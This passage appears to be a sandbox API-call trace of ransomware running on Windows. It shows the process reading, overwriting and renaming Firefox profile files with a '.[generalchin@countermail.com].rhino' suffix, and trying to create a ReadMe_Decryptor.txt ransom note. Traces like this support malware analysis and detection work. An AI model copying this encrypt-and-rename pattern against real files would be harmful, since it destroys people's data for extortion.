Flags=0x0, Size=0x4) returned 0x72b818 [0096.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0096.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0096.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0096.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0096.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0096.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0096.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0096.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0096.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0096.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0096.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x24b0150 [0096.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0096.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x24b03e0 [0096.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0150 | out: hHeap=0x6d0000) returned 1 [0096.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x24b0528 [0096.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b03e0 | out: hHeap=0x6d0000) returned 1 [0096.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x24b0710 [0096.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0528 | out: hHeap=0x6d0000) returned 1 [0096.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x24b09e0 [0096.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0710 | out: hHeap=0x6d0000) returned 1 [0096.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x23b0048 [0096.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b09e0 | out: hHeap=0x6d0000) returned 1 [0096.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x24b03e0 [0096.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0096.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x23b0048 [0096.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b03e0 | out: hHeap=0x6d0000) returned 1 [0096.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x762fa8 [0096.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0096.843] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7644e8 [0096.843] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x762fa8 | out: hHeap=0x6d0000) returned 1 [0096.843] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7664b0 [0096.843] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7644e8 | out: hHeap=0x6d0000) returned 1 [0096.843] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x73c0b8 [0096.843] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7664b0 | out: hHeap=0x6d0000) returned 1 [0096.847] WriteFile (in: hFile=0xec, lpBuffer=0x73c0c0*, nNumberOfBytesToWrite=0x4120, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x73c0c0*, lpNumberOfBytesWritten=0x2cfa04*=0x4120, lpOverlapped=0x0) returned 1 [0096.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0096.848] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4120, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0096.849] CloseHandle (hObject=0xec) returned 1 [0096.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x24b0150 [0096.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x24b03e0 [0096.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0150 | out: hHeap=0x6d0000) returned 1 [0096.851] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0096.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b03e0 | out: hHeap=0x6d0000) returned 1 [0096.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0258 | out: hHeap=0x6d0000) returned 1 [0096.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0096.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0096.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0096.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0096.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0096.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0096.853] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0096.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0096.890] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x501 [0096.890] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x621, nNumberOfBytesToLockHigh=0x0) returned 1 [0096.890] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.891] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0096.942] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.942] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x501, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x501, lpOverlapped=0x0) returned 1 [0096.942] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0096.942] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.942] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0096.942] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0096.942] GetLastError () returned 0x0 [0096.942] SetLastError (dwErrCode=0x0) [0096.943] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0096.943] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x501) returned 0x24b0048 [0096.943] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0096.943] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0558 [0096.943] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x24b0660 [0096.943] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0558 | out: hHeap=0x6d0000) returned 1 [0096.943] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.943] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0096.943] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0096.943] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.943] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0096.943] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0096.943] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0096.943] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.943] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0096.943] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0096.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0096.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0096.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0096.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0096.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0096.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0096.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0096.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0096.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0096.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0096.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0096.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0096.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0096.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0096.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0096.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x24b0558 [0096.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0096.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x24b07e8 [0096.945] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0558 | out: hHeap=0x6d0000) returned 1 [0096.945] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x24b0930 [0096.945] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b07e8 | out: hHeap=0x6d0000) returned 1 [0096.945] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x24b0b18 [0096.945] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0930 | out: hHeap=0x6d0000) returned 1 [0096.945] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b0048 [0096.945] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0b18 | out: hHeap=0x6d0000) returned 1 [0096.945] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x24b07e8 [0096.945] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0096.945] WriteFile (in: hFile=0xec, lpBuffer=0x24b07e8*, nNumberOfBytesToWrite=0x621, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x24b07e8*, lpNumberOfBytesWritten=0x2cfa04*=0x621, lpOverlapped=0x0) returned 1 [0096.945] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b07e8 | out: hHeap=0x6d0000) returned 1 [0096.945] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x621, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0096.946] CloseHandle (hObject=0xec) returned 1 [0096.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0096.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x24b07e8 [0096.947] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0096.947] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0096.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b07e8 | out: hHeap=0x6d0000) returned 1 [0096.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0660 | out: hHeap=0x6d0000) returned 1 [0096.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0096.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0096.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0096.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0096.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0096.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0096.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0096.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0096.950] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x39 [0096.950] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x159, nNumberOfBytesToLockHigh=0x0) returned 1 [0096.950] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.951] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0096.953] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.953] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x39, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x39, lpOverlapped=0x0) returned 1 [0096.953] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0096.953] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.953] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0096.953] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0096.953] GetLastError () returned 0x0 [0096.953] SetLastError (dwErrCode=0x0) [0096.954] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x39) returned 0x6e74c8 [0096.954] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0048 [0096.954] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x24b0150 [0096.954] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0096.954] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0096.954] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0096.954] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0096.954] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0096.954] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0096.954] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0096.955] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0096.955] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0096.955] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0096.955] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0096.955] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0096.955] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x159) returned 0x24b02d8 [0096.955] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0096.955] WriteFile (in: hFile=0xec, lpBuffer=0x24b02d8*, nNumberOfBytesToWrite=0x159, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x24b02d8*, lpNumberOfBytesWritten=0x2cfa04*=0x159, lpOverlapped=0x0) returned 1 [0096.956] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0096.956] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x159, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0096.956] CloseHandle (hObject=0xec) returned 1 [0096.957] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0096.957] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x24b02d8 [0096.957] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0096.957] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0096.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0096.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0150 | out: hHeap=0x6d0000) returned 1 [0096.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0096.958] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0096.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0096.958] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0096.958] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0096.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0096.958] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, 